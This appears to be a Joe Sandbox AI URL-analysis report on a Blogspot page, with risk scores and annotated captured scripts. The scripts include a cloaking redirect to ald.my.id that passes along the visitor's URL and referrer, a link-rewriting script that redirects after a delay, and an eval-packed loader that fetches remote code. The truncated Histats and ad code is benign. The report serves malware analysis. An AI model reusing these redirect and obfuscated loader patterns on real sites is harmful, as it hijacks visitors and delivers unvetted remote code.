URL: http://home45insurance.blogspot.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: http://home45insurance.blogspot.com |
URL: https://home45insurance.blogspot.com/... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The script exhibits moderate-risk behaviors, including redirecting users to an external domain and potentially collecting sensitive information (referrer URL and user agent) without clear transparency. While the script may have a legitimate purpose, such as analytics or tracking, the lack of context and the use of an obfuscated domain raise concerns that require further investigation."
} |
//<![CDATA[
// Captured sample: referrer / user-agent gated redirect served from the Blogspot landing page.
// `ars` is the origin the visitor is sent to.
var ars = 'https://ald.my.id';
// The gate looks like a cloaking check: it fires when the referrer contains one of the listed
// search-engine or social substrings, or when the user agent contains 'fb', 'facebook',
// 'pinterest' or 'twitter'.
// NOTE(review): the referrer list also contains '' and '.'. String.prototype.includes('')
// is true for every string, including an empty referrer, so the first .some() always
// succeeds and the redirect runs for every visitor. The gate is effectively unconditional.
// The redirect passes the current page URL as `arsae` and the referrer as `arsae_ref`,
// both URL-encoded. Requests to the target origin carrying these two query parameters are
// a usable network indicator for this sample.
if(['.google.', 'bing.', 'yandex.', '', 'duckduckgo.', 'yahoo.', '.', 'pinterest.'].some(s => document.referrer.toLowerCase().includes(s)) || ['fb', 'facebook', 'pinterest', 'twitter'].some(s => navigator.userAgent.toLowerCase().includes(s))){ window.location.href = ars + '/?arsae='+ encodeURIComponent(window.location.href) + '&arsae_ref='+ encodeURIComponent(document.referrer) }
//
|
URL: https://ald.my.id/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
|
URL: https://ald.my.id/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
|
URL: https://ald.my.id/ Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
URL: https://ald.my.id/ Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
URL: https://ald.my.id Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://ald.my.id |
URL: https://ald.my.id/... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This script exhibits several high-risk behaviors, including redirecting users to potentially malicious domains after a delay, and modifying all links on the page to include a 'redirected' parameter. These behaviors are highly suspicious and indicate a potential phishing or malware attempt."
} |
// Captured sample: on window load, tag every link with a 'redirected' marker and,
// unless the current URL already carries that marker, navigate away after 60 seconds.
window.addEventListener('load', function(){
var r = 'redirected', hash, loc, urls, atags = document.getElementsByTagName('a'), i = atags.length, tag;
// Walk all <a> elements from last to first.
while(--i > -1){
// Skip anchors without an href and anchors whose query string already contains the marker.
if(!(tag = atags[i]).href || tag.search.indexOf(r) > -1){continue;}
// Strip the fragment, append the marker as a query parameter, then put the fragment back.
hash = tag.hash;
loc = tag.href.replace(hash, '');
loc += (loc.indexOf('?') < 0? '?' : '&') + r + hash;
tag.href = loc;
}
// The marker suppresses the timed redirect: a page reached through a tagged link,
// or through the redirect below, does not redirect again.
if(location.search.indexOf(r) > -1){return;}
// Candidate destinations. Only one entry is present, so the random pick below
// always selects it.
urls = ["https://ald7verify.blogspot.com/"];
// After 60000 ms the top-level page navigates to the chosen destination with '?redirected'
// appended. A sandbox run shorter than 60 seconds will not observe this navigation.
setTimeout(function(){
window.location.href = urls[Math.floor(urls.length*Math.random())] + '?' + r;
}, 60000);
}, false);
|
URL: https://ald.my.id/... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The script appears to be collecting referrer and user agent information, which could be used for tracking or analytics purposes. While the behavior is not inherently malicious, the use of a non-transparent domain ('ald.my.id') and the lack of clear context around the script's purpose warrant further review."
} |
//<![CDATA[
// Captured sample: variant of the referrer / user-agent gate that only builds a URL.
// Unlike a redirecting variant, this snippet never assigns window.location; it only
// rewrites `ars`. Presumably `ars` is read by code outside this snippet. Confirm against
// the full page.
var ars = 'https://ald.my.id';
// NOTE(review): the referrer list contains '' and '.'. String.prototype.includes('')
// is true for every string, so the condition holds for every visitor and `ars` always
// gains the `arsae` (current URL) and `arsae_ref` (referrer) parameters.
if(['.google.', 'bing.', 'yandex.', '', 'duckduckgo.', 'yahoo.', '.', 'pinterest.'].some(s => document.referrer.toLowerCase().includes(s)) || ['fb', 'facebook', 'pinterest', 'twitter'].some(s => navigator.userAgent.toLowerCase().includes(s))){ ars = ars + '/?arsae='+ encodeURIComponent(window.location.href) + '&arsae_ref='+ encodeURIComponent(document.referrer) }
//
|
URL: https://ald.my.id/... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a configuration object for an infinite scroll or auto-load functionality. Apart from the `eval()` call discussed below, it does not contain high-risk indicators like data exfiltration or suspicious redirects. The code otherwise uses standard JavaScript constructs. The main concern is the use of the `eval()` function, which is dynamic code execution and can be a security risk if used improperly; in this case it seems to be part of a common packer-style obfuscation technique and was not judged to pose a significant threat. This assessment covers only the visible wrapper, so the packed payload should be unpacked and reviewed before the score is relied on. Overall, the script appears to be a benign configuration setup with no clear signs of malicious intent."
} |
//<![CDATA[
// Page-level settings object exposed on window for the script loaded below.
window.config = {
infinite_scroll:false, // `true` to enable, `false` to disable
auto: false // `true` to auto-load, `false` if a button must be clicked first
}
// Packed payload: a p,a,c,k,e,d-style unpacker rebuilds source text from the
// '|'-separated dictionary and hands it to eval(), so the code that runs is not
// visible in this listing. This is dynamic code execution.
// NOTE(review): unpacked by hand from the dictionary on this line, the payload registers
// a DOMContentLoaded listener that creates an async <script> element with
// src "https://cdn.rawgit.com/igniel/blogger/master/iglo/v2.js" and appends it to <head>.
// Verify this by unpacking in an isolated analysis environment. The remote file is
// fetched at runtime with no integrity pinning, so what executes depends on whatever
// that host serves at load time. RawGit was, as far as known, announced as discontinued
// by its maintainer, so confirm who serves that host today.
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('A c=["\\G\\F\\H\\z\\q\\e\\b\\a\\e\\b\\y\\q\\d\\h\\a\\h","\\f\\k\\i\\g\\n\\b","\\k\\i\\a\\d\\b\\a\\u\\m\\a\\p\\a\\e\\b","\\b\\r\\n\\a","\\b\\a\\I\\b\\j\\x\\d\\v\\d\\f\\k\\i\\g\\n\\b","\\f\\i\\k","\\t\\b\\b\\n\\f\\E\\j\\j\\k\\h\\e\\s\\i\\d\\K\\l\\g\\b\\s\\k\\q\\p\\j\\g\\l\\e\\g\\a\\m\\j\\D\\m\\q\\l\\l\\a\\i\\j\\p\\d\\f\\b\\a\\i\\j\\g\\l\\m\\q\\j\\v\\B\\s\\x\\f","\\d\\f\\r\\e\\k","\\d\\n\\n\\a\\e\\h\\z\\t\\g\\m\\h","\\t\\a\\d\\h","\\l\\a\\b\\u\\m\\a\\p\\a\\e\\b\\f\\Q\\r\\N\\d\\l\\M\\d\\p\\a","\\d\\h\\h\\u\\v\\a\\e\\b\\y\\g\\f\\b\\a\\e\\a\\i"];w[c[J]](c[0],P(){A o=w[c[2]](c[1]);o[c[3]]=c[4];o[c[5]]=c[6];o[c[7]]=L;w[c[C]](c[9])[0][c[8]](o)},O)',53,53,'||||||||||x65|x74|_0x6c73|x61|x6E|x73|x69|x64|x72|x2F|x63|x67|x6C|x70|_0xf37dx1|x6D|x6F|x79|x2E|x68|x45|x76|document|x6A|x4C|x43|var|x32|10|x62|x3A|x4F|x44|x4D|x78|11|x77|true|x4E|x54|false|function|x42'.split('|'),0,{}));
//
|
URL: https://ald.my.id/... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a tracking script, likely used for analytics or website statistics. It pushes data to the 'Histats' service, which is a legitimate web analytics platform. While the script uses some legacy practices like the `_Hasync` array, it does not exhibit any high-risk behaviors like dynamic code execution, data exfiltration, or suspicious redirects. The overall risk is low, as the script's purpose seems to be legitimate analytics and tracking."
} |
// Histats loader snippet: queue commands on the global `_Hasync` array, then inject
// the remote tracker script.
// Reuse an existing queue if one is already defined on the page; otherwise start empty.
var _Hasync= _Hasync|| [];
// Queued commands with their argument strings. The 'Histats.start' argument carries
// the numeric identifiers for this counter; presumably one of them is the site/account ID,
// which would make it a pivot for finding related pages. Confirm against Histats docs.
_Hasync.push(['Histats.start', '1,4785196,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
// Build an async <script> element pointing at the tracker.
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
// Protocol-relative URL: the script is fetched over the same scheme as the embedding
// page. No integrity attribute is set, so the content is not pinned.
hs.src = ('//s10.histats.com/js15_as.js');
// Append to <head> when present, otherwise to <body>.
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();
|
URL: https://s10.histats.com/js15_as.js... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet exhibits several behaviors that raise moderate security concerns. While it does not contain any clear indicators of malicious intent, it exhibits some practices that could potentially be used for undesirable purposes. The key factors contributing to the medium risk score are:
1. External Data Transmission (+2 points): The script sends user data to third-party domains via XHR, fetch, or sendBeacon without clear transparency.
2. Fallback Domains (+2 points): The script uses multiple fallback domains, some of which may be of unknown or dubious reputation.
3. Aggressive DOM Manipulation (+2 points): The script repeatedly alters or clears the DOM, which could potentially be used for malicious purposes.
While the script does not contain any high-risk indicators like dynamic code execution or obvious data exfiltration, the combination of these moderate-risk behaviors warrants further review and investigation to ensure the script's legitimacy and intended purpose. Additional context or information about the script's usage and the reputation of the involved domains would be helpful in providing a more accurate risk assessment."
} |
(function(){var n="undefined",t=function(t){return typeof t!==n},e="js15_as.js",r="",i=!1,o=!1,a=!1,s=!1,c="0.2.1",u=25,_="-",f="_HISTATS_SID",d="histats_custom_destDivProducer",p=function(n){_+="_"+n};p(c);var v=function(){i&&console.log.apply(this,arguments)},l=function(n,r){var i=n||{};try{var o=r.document,a=r.navigator,s=r.screen,c=r.Date,f=r.Math,d=function(){return o},p=function(){return d().getElementsByTagName("body")[0]||d().getElementsByTagName("head")[0]},l=function(n){return"function"==typeof n},h=function(n){return t(n)&&n instanceof Array},m=function(n){return t(n)&&!!d().getElementById(n)},y=function(n){var e=!1;if(t(n)){if("NaN"==parseInt(n))return!1;e=parseInt(n)>0}return e},g=function(n){return y(n)?parseInt(n):0},w=function(n){return"string"!=typeof n||n.length<1?n:n.replace(/^['"]?(.*)['"]$/,"$1")},T=t(window["_DEBUG_HISTATS_ASYNCR_DO_NOT_AUTOSTART"]),I=function(){return parseInt(1e4*f.random())+1},H=function(){return Math.floor(4e8*Math.random())-2e8},C=I(),E="histats_counter",b=H(),S=function(n,e,r){if(!t(n))return t(r)&&r(n),void 0;for(var i in n)n.hasOwnProperty(i)&&e(i,n[i],n)},R=0,O=function(){R++},A=function(n){return"string"==typeof n},D=function(n){var e=!1;return t(n)&&A(n)&&(e=(n+"").length>0),e},N="1000",U="0",B="0.php?";i.o_i=0,i.ver=16,i.eve=3,i.cver=0,i.s_id=0,i.s_pd=0,i.d_op=0,i.i_dom=4,i.i_id=0,i.i_w=0,i.i_h=0,i.i_b="",i.s_d="",i.s_u="",i.s_l="0",i.s_t="",i.d_s=0,i.d_fa=0;var j=0,F=0;i.d_tf=0,i.d_nv=1,i.d_mu=0,i.d_cv=0,i.d_cs=0,i.d_cp=0,i.d_pON=0;var G=45e3,x=0;i.d_pn=0,i.d_pt=0,i.f_pv=0,i.s_ta="",i.a_va=[],i.s_ti="",i.asi=0,i.o_fa=0,i.o_de=0,i.o_BC=0,i.o_fr=0,i.p_ff=0,i.n_a="",i.n_f=0,i.n_n=0,i.o_n=0;var k=31536e6;i.c_on=0,i.s_sc1="1",i.s_sc2="11111111",i.s_asc2={};var L=function(){return i.i_id},M=function(n){i.i_id=g(n)},q=function(){return 700==L()||0==L()},P=function(){var n=L();return!q()&&n>0&&n<5e3},z=function(){return L()>=8e3&&L()<9e3},J=function(){return L()>=1e4&&L()<10100},W=function(){return 
L()>=500&&L()<600},Y=function(n){artificialFrameRequestReference=r.setTimeout(n,1e3/u)},$=r.requestAnimationFrame||r.webkitRequestAnimationFrame||r.mozRequestAnimationFrame||r.msRequestAnimationFrame||r.oRequestAnimationFrame||Y,K=function(){return 1==i.asi||"1"==i.asi},V=function(){i.asi=1},Q="";i.fasi=function(n){i.asi=n};var X="https://",Z=function(){try{return"https:"===o.location.protocol?"https://":"http://"}catch(n){return"https://"}},nn=function(){try{return"https:"===o.location.protocol}catch(n){return!1}},tn=function(){return"s10.histats.com"},en=function(){return"s10.histats.com"},rn=function(){return"s"+i.i_dom+".histats.com"},on=function(){return"s"+i.i_dom+"i.histats.com"},an=function(n){d().writeln('<script type="text/javascript" language="JavaScript" src="'+n+'"></script>')},sn=function(n){return'<script type="text/javascript" language="JavaScript" >document.writeln(\''+n+"');</script>"},cn=function(n){d().writeln(sn(n))},un=function(n){d().write(n)},_n=function(){var n='<div id="'+Bn()+'" style="display: none;"></div>';un(n),E=Bn()},fn=function(){var n=d().createElement("div");n.id=Bn();var t=d().getElementById("histats_counter");t?t.appendChild(n):v("err_10")},dn=!0,pn=[0,1500,5e3],vn=function(n,t,e){var r=[0,1500,5e3],i=[],o=!1;for(var a in r){var s=r[a],c=function(n){for(;i.length;){var t=i.pop();clearTimeout(t)}o||(o=!0,e(n))},u=setTimeout(function(){dn&&ln(n,c)},s);i.push(u)}},ln=function(n,t){var e=d().createElement("script");try{e.async=!0}catch(r){}e.type="text/javascript",e.src=n,e&&"function"==typeof t&&(e.readyState?e.onreadystatechange=function(){var n=e.readyState;("loaded"==n||"complete"==n||parseInt(n)>1)&&(e.onreadystatechange=null,t(r))}:"function"==typeof e.addEventListener?e.addEventListener("load",function(n){t(n)}):dn=!1),p().appendChild(e)},hn=function(){return 1==i.p_ff},mn=function(){return i.p_ff=1},yn=function(){return i.o_fa>0},gn=function(){return i.o_fa=1};i.is=t,i.isd=y;var wn=function(){return 
i.s_id},Tn=function(){return wn()<1},In=function(n){i |
URL: https://pagead2.googlesyndication.com/pagead/js/ad... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The script uses dynamic code execution through 'execScript', which is a high-risk indicator (+3 points). It also includes aggressive DOM manipulation patterns, such as altering global objects and properties, which is a moderate-risk indicator (+2 points). However, there is no clear evidence of data exfiltration or interaction with suspicious domains, which keeps the score in the medium risk range."
} |
(function(sttc){'use strict';var aa,ba=Object.defineProperty;function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",fa={},ha={};function ia(a,b,c){if(!c||a!=null){c=ha[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}}
function ja(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in fa?f=fa:f=da;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=ea&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?ba(fa,d,{configurable:!0,writable:!0,value:b}):b!==c&&(ha[d]===void 0&&(a=Math.random()*1E9>>>0,ha[d]=ea?da.Symbol(d):"$jscp$"+a+"$"+d),ba(f,ha[d],{configurable:!0,writable:!0,value:b})))}}ja("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")},"es_next");/*
Copyright The Closure Library Authors.
SPDX-License-Identifier: Apache-2.0
*/
var p=this||self;function ka(a,b){var c=la("CLOSURE_FLAGS");a=c&&c[a];return a!=null?a:b}function la(a){a=a.split(".");for(var b=p,c=0;c<a.length;c++)if(b=b[a[c]],b==null)return null;return b}function ma(a){var b=typeof a;return b=="object"&&a!=null||b=="function"}function na(a){return Object.prototype.hasOwnProperty.call(a,oa)&&a[oa]||(a[oa]=++pa)}var oa="closure_uid_"+(Math.random()*1E9>>>0),pa=0;function qa(a,b,c){return a.call.apply(a.bind,arguments)}
function ra(a,b,c){if(!a)throw Error();if(arguments.length>2){var d=Array.prototype.slice.call(arguments,2);return function(){var e=Array.prototype.slice.call(arguments);Array.prototype.unshift.apply(e,d);return a.apply(b,e)}}return function(){return a.apply(b,arguments)}}function sa(a,b,c){sa=Function.prototype.bind&&Function.prototype.bind.toString().indexOf("native code")!=-1?qa:ra;return sa.apply(null,arguments)}
function ta(a,b,c){a=a.split(".");c=c||p;a[0]in c||typeof c.execScript=="undefined"||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||b===void 0?c[d]&&c[d]!==Object.prototype[d]?c=c[d]:c=c[d]={}:c[d]=b};let ua=(new Date).getTime();function va(a){p.setTimeout(()=>{throw a;},0)};function wa(a){return/^[\s\xa0]*([\s\S]*?)[\s\xa0]*$/.exec(a)[1]}
function xa(a,b){let c=0;a=wa(String(a)).split(".");b=wa(String(b)).split(".");const d=Math.max(a.length,b.length);for(let g=0;c==0&&g<d;g++){var e=a[g]||"",f=b[g]||"";do{e=/(\d*)(\D*)(.*)/.exec(e)||["","","",""];f=/(\d*)(\D*)(.*)/.exec(f)||["","","",""];if(e[0].length==0&&f[0].length==0)break;c=za(e[1].length==0?0:parseInt(e[1],10),f[1].length==0?0:parseInt(f[1],10))||za(e[2].length==0,f[2].length==0)||za(e[2],f[2]);e=e[3];f=f[3]}while(c==0)}return c}function za(a,b){return a<b?-1:a>b?1:0};var Aa=ka(610401301,!1),Ba=ka(653718497,ka(1,!0));function Ca(){var a=p.navigator;return a&&(a=a.userAgent)?a:""}var Da;const Ea=p.navigator;Da=Ea?Ea.userAgentData||null:null;function Fa(a){return Aa?Da?Da.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function q(a){return Ca().indexOf(a)!=-1};function Ga(){return Aa?!!Da&&Da.brands.length>0:!1}function Ha(){return Ga()?!1:q("Trident")||q("MSIE")}function Ia(){return Ga()?Fa("Microsoft Edge"):q("Edg/")}function Ja(){!q("Safari")||Ka()||(Ga()?0:q("Coast"))||(Ga()?0:q("Opera"))||(Ga()?0:q("Edge"))||Ia()||Ga()&&Fa("Opera")}function Ka(){return Ga()?Fa("Chromium"):(q("Chrome")||q("CriOS"))&&!(Ga()?0:q("Edge"))||q("Silk")}function La(a){const b={};a.forEach(c=>{b[c[0]]=c[1]});return c=>b[c.find(d=>d in b)]||""}
function Ma(){var a=Ca();if(Ha()){var b=/rv: *([\d\.]*)/.exec(a);if(b&&b[1])a=b[1];else{b="";var c=/MSIE +([\d\.]+)/.exec(a);if(c&&c[1])if(a=/Trident\/(\d.\d)/.exec(a),c[1]=="7.0")if(a&&a[1])switch(a[1]){case "4.0":b="8.0";break;case "5.0":b="9.0";break;case "6.0":b="10.0";break;case "7.0":b="11.0"}else b="7.0";else b=c[1];a=b}return a}c=RegExp("([A-Z][\\w ]+)/([^\\s]+)\\s*(?:\\((.*?)\\))? |